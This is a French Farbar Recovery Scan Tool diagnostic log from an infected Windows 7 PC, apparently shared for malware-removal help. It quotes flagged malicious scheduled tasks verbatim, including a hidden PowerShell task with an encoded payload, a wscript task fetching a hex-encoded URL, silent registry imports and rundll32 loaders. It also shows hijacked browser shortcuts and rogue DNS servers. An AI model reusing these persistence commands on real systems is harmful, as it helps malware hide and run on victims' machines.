Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 09-12-2017
Exécuté par C-3PO (09-12-2017 18:04:24)
Exécuté depuis C:\Users\C-3PO\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-07-18 07:13:51)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-1342067083-540354075-4242860494-500 - Administrator - Disabled)
C-3PO (S-1-5-21-1342067083-540354075-4242860494-1000 - Administrator - Enabled) => C:\Users\C-3PO
HomeGroupUser$ (S-1-5-21-1342067083-540354075-4242860494-1002 - Limited - Enabled)
Invité (S-1-5-21-1342067083-540354075-4242860494-501 - Limited - Disabled)
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
Adblock Plus pour IE (32-bits et 64-bits) (HKLM\...\{40F6FB81-1B50-443B-A8E0-BC70E62CFB21}) (Version: 1.6 - Eyeo GmbH)
Adobe Acrobat Reader DC - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Alcor Micro Smart Card Reader Driver (HKLM-x32\...\{F24F876B-7D71-4BD6-88E9-614D3BB84216}) (Version: 1.7.16.0 - Alcor Micro Corp.) Hidden
Alcor Micro Smart Card Reader Driver (HKLM-x32\...\SZCCID) (Version: 1.7.16.0 - Alcor Micro Corp.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Broadcom 2070 Bluetooth 3.0 (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.6300 - Broadcom Corporation)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.48.61 - Broadcom Corporation)
Broadcom Wireless Utility (HKLM\...\Broadcom Wireless Utility) (Version: 5.60.48.61 - Broadcom Corporation)
ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 3.16.0.1 - Byte Technologies LLC) <==== ATTENTION
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
DragonBoost (HKU\S-1-5-21-1342067083-540354075-4242860494-1000\...\119) (Version: - ) <==== ATTENTION
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{7D75E270-0888-4331-96CC-B2A823B1C370}) (Version: 4.1.4.1 - Hewlett-Packard Company)
HP Connection Manager (HKLM-x32\...\{795AADBF-58C2-42D0-B779-E730702A247E}) (Version: 4.0.45.1 - Hewlett-Packard Company)
HP DayStarter (HKLM\...\{6876B842-0B24-405D-8A24-9DA0BC44A524}) (Version: 2.0.0.12 - Hewlett-Packard Company)
HP HotKey Support (HKLM\...\{8263B36C-A41E-4422-9031-1AE3641263AE}) (Version: 4.0.10.1 - Hewlett-Packard Company)
HP Power Assistant (HKLM\...\{DB41CA83-E024-4B66-9A8B-2787D2DAFE57}) (Version: 2.0.2.0 - Hewlett-Packard Company)
HP Webcam Driver (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.50058.0 - Sonix)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6325.0 - IDT)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2291 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
JMicron 1394 Filter Driver (HKLM-x32\...\{13C96625-28E4-4c58-ADE0-CDAFC64752EB}) (Version: 1.00.20.00 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.56.1 - JMicron Technology Corp.)
Joliebulle version 3.6 (HKLM-x32\...\{6192856F-8FBF-467C-A5E0-B5072405ED91}_is1) (Version: 3.6 - Pierre Tavares)
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation)
Microsoft Office Famille et Petite Entreprise 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 57.0.2 (x64 fr) (HKLM\...\Mozilla Firefox 57.0.2 (x64 fr)) (Version: 57.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.2 - Mozilla)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION
Palikan (HKLM-x32\...\{2F7EC7BE-7FFE-163E-CE7E-66BE1EFEB53E}) (Version: - )
Scratch Live 2.5.0 (11) (HKLM-x32\...\{EA21EB55-073F-4CF5-A964-0412E755955A}) (Version: 2.5.0 - Serato Inc LP)
SDK (HKLM-x32\...\{0DEA342C-15CB-4F52-97B6-06A9C4B9C06F}) (Version: 2.24.025 - Portrait Displays, Inc.) Hidden
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.25 - Synaptics Incorporated)
Validity Fingerprint Sensor Driver (HKLM\...\{FFC3E41D-2C2B-45B7-9AD9-5EA19572DD26}) (Version: 4.3.117.0 - Validity Sensors, Inc.)
VidsqaurE (HKLM-x32\...\{A97606DF-0FE1-4390-B0DD-ADA8B303AE61}_is1) (Version: 1.4 - ) <==== ATTENTION
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2011-01-27] (Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {08494ACC-5AE0-4628-BF3B-D5F9E060FD48} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-08-23] () <==== ATTENTION
Task: {0E375635-E892-43C0-A703-72EB1BF35A57} - System32\Tasks\MJHiy315mf => C:\Program Files (x86)\rkD7DjTUbV\updengine.exe <==== ATTENTION
Task: {1296C4C9-A4CB-43A8-B212-A68F4B8C121A} - System32\Tasks\psv_Bamfind => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Strongdex.reg" & del "C:\ProgramData\Quoteex\Strongdex.reg" & SCHTASKS /Delete /TN "psv_Bamfind" /F <==== ATTENTION
Task: {152C23CD-2591-4D12-89C7-EF6C6BC05C9D} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-10-03] (Byte Technologies LLC) <==== ATTENTION
Task: {1C102085-031F-4A82-91AF-FC30D8E3C513} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {2A5E1462-37C2-4023-9803-17BCD4FAD9AE} - System32\Tasks\psv_Alphait => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Itdinity.reg" & del "C:\ProgramData\Quoteex\Itdinity.reg" & SCHTASKS /Delete /TN "psv_Alphait" /F <==== ATTENTION
Task: {325A18BC-BF0C-4230-A5BA-8693CA1D49FE} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {3715CB8A-677A-43F0-8B4E-05F02A9B54B4} - System32\Tasks\Yahoo! Powered tesof => C:\Windows\system32\wscript.exe "C:\ProgramData\{F1CF34AC-7B8D-BE6A-FD4B-20286709ABE6}\fece.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d464434422d3230323836373039414245367d5c7361746f746f" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d4644 (l'élément de données a 80 caractères en plus). <==== ATTENTION
Task: {4230B0FC-CC97-4BAB-B830-4C84D9DB25FC} - System32\Tasks\2f125f0fbe8a9d4d50ade39a0d76fa2c => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\Windows\2f125f0fbe8a9d4d50ade39a0d76fa2c.ps1" <==== ATTENTION
Task: {5393FCD5-E1B1-4DE0-BD4C-924BBF57AA95} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {71E549D1-AF10-41E3-8CAD-56DAB31915F5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {7BDC94A4-05A6-4229-B3A4-195363A86CB0} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
Task: {7D8B1D88-BA3A-40B5-BA8A-DF8523628A7A} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {8D5A27DA-41A5-449C-9ED2-DCBFA593FEAA} - System32\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C} => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE
Task: {991E1A5E-AC00-4E60-928F-39B18A33A6F4} - System32\Tasks\psv_Tinlight => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Lighttough.reg" & del "C:\ProgramData\Quoteex\Lighttough.reg" & SCHTASKS /Delete /TN "psv_Tinlight" /F <==== ATTENTION
Task: {9D58D87A-560C-4979-B3C7-9F0B3E8AB0F4} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {B4B9F2B3-C7A3-4E2C-B24D-25BEF8092D22} - System32\Tasks\8c023e14d62cc32fcaee500b3f1fb4dd => sc start 8c023e14d62cc32fcaee500b3f1fb4dd <==== ATTENTION
Task: {B64FEB13-6ECE-4C1B-BD8D-680FF76E41D0} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
Task: {B6E99B9D-A1E4-4903-AA9F-97AD036251C9} - System32\Tasks\psv_Domflex => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\S-fax.reg" & del "C:\ProgramData\Quoteex\S-fax.reg" & SCHTASKS /Delete /TN "psv_Domflex" /F <==== ATTENTION
Task: {C9BF127A-FD77-4573-A9DF-D14E151BC55E} - System32\Tasks\PnFXZuSqjm => C:\Program Files (x86)\jVddbi7Omy\updengine.exe <==== ATTENTION
Task: {DC7047A6-950B-4469-95E7-EE3C7C47FAAD} - System32\Tasks\h1vGT0e3jr => C:\Program Files (x86)\aC0MAzjNgZ\updengine.exe <==== ATTENTION
Task: {DD2713B0-2652-4EEA-AD34-18D8141DA007} - System32\Tasks\ADS DVD Burner => C:\Windows\system32\rundll32.exe "C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll",vVkByOuobwZp <==== ATTENTION
Task: {E3B6C88C-0B1C-4DAE-B45C-640073AFF9FE} - System32\Tasks\EditRyIde => C:\Windows\system32\rundll32.exe "C:\Program Files\EditRyIde\EditRyIde.dll",IQTWaLBM <==== ATTENTION
Task: {E44163F4-8506-4B71-A750-814B62A9775F} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
Task: {E7556430-47F3-4BB9-89D8-E435CC92D3CD} - System32\Tasks\Broadcom 1321F Wireless Mp525P => C:\Windows\system32\rundll32.exe "C:\Program Files\Broadcom 1321F Wireless Mp525P\Broadcom 1321F Wireless Mp525P.dll",RQsQpt <==== ATTENTION
Task: {EBA12B14-21E3-4B65-8FF4-814012A42B00} - System32\Tasks\SMW_UpdateTask_Time_323136313635353832372d3237575a236c6c3255342a41 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {ED14CDD1-F50A-433B-A00B-079CB77466FE} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: {F36C961C-8D9E-4171-910F-477C1865591A} - System32\Tasks\xy8EGwcCsXnF => xy8egwccsxnf.exe
Task: {F57061BC-CFC7-4E68-A390-18678D54B00C} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: {F89AB432-15F2-4002-B939-7A6A5F9CFD8C} - System32\Tasks\{0D0F0447-0D7E-790C-7811-79050B0C110C} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAA7ACAAOwAgADsAOwA7ACAAIAA7ADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (l'élément de données a 10000 caractères en plus). <==== ATTENTION
Task: {F9537F5A-A4DC-4224-AB03-B1B2D4B6C331} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {F9EE7113-FF80-4A9C-B60C-CAD83A043982} - System32\Tasks\SystemHealer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
Task: C:\Windows\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C}.job => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE
==================== Raccourcis & WMI ========================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
Shortcut: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Serato\Scratch LIVE\Install ASIO Drivers.lnk -> C:\Program Files (x86)\Serato\asio_installer.bat ()
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d,
==================== Modules chargés (Avec liste blanche) ==============
2017-09-16 12:58 - 2015-06-01 03:24 - 002144768 _____ () C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll
2016-07-18 08:33 - 2011-01-27 03:11 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-07-29 18:39 - 2010-07-29 18:39 - 000173856 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll
2011-01-26 17:14 - 2011-01-26 17:14 - 000036408 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Remote.dll
2017-12-09 14:44 - 2017-12-09 14:44 - 000304456 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
2017-12-09 14:44 - 2017-12-09 14:44 - 000619848 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
2011-01-26 17:13 - 2011-01-26 17:13 - 000080440 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HardwareAccess.dll
2011-01-26 17:13 - 2011-01-26 17:13 - 000047160 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\Graphs.dll
2016-07-18 08:50 - 2011-01-26 16:34 - 001083392 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\System.Data.SQLite.dll
2010-06-24 01:21 - 2010-06-24 01:21 - 001102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2017-03-07 19:18 - 2017-03-07 19:18 - 000582936 _____ () C:\Program Files\ByteFence\rsLggr.exe
2017-12-09 16:44 - 2017-12-09 16:44 - 000516096 _____ () C:\Windows\TEMP\g2CFB.tmp.exe
2017-12-09 16:57 - 2017-12-09 16:57 - 002943360 _____ () C:\Users\C-3PO\Downloads\ZHPDiag3.exe
2017-08-29 10:38 - 2017-08-29 10:38 - 000862720 _____ () C:\Program Files (x86)\jVddbi7Omy\kl.dll
2010-06-24 01:19 - 2010-06-24 01:19 - 000514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2016-07-18 08:32 - 2011-01-13 02:56 - 000058880 ____R () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
==================== Hosts contenu: ==========================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2009-07-14 03:34 - 2017-12-09 16:34 - 000015502 _____ C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com
127.0.0.1 dwl1.wizzlabs.com
127.0.0.1 mess1.wizzmonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 dl.smashdl.com
127.0.0.1 downloadmyhost.com
127.0.0.1 lapapahoster.com
127.0.0.1 gf.tools.avast.com
127.0.0.1 pair.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
Il y a 392 plus de lignes.
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-1342067083-540354075-4242860494-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.142.8 - 95.211.158.136
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{8C0B5E7D-8900-4300-8AD7-CEF9199DAA9E}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{F13C6AAE-F7C7-40A8-B1C0-8DC245259323}] => (Allow) C:\Users\C-3PO\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{B078CC0B-4227-439C-89EC-905E5AD88ACF}] => (Allow) C:\Users\C-3PO\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{1D3610F3-8E4E-4896-9623-A469497AE236}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{10C04D03-0B30-4F50-A663-91344AA412A4}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{11D9F36B-80A1-4FE1-A6A3-E03057094E3F}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{F49BD9D4-5153-4D98-9266-9DDBEC3B6138}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{B4EA3574-312E-4859-AFB2-97E2AD088264}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{F6CD6BF6-86DA-4893-B2AE-B5EB4A2BD017}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{235CCAB7-0768-47B5-869C-9060E7EE9D96}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Points de restauration =========================
==================== Éléments en erreur du Gestionnaire de périphériques =============
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (12/09/2017 05:51:49 PM) (Source: Validity USDK) (EventID: 40) (User: )
Description: SSL alert by host: Description is: 47.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT)
Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
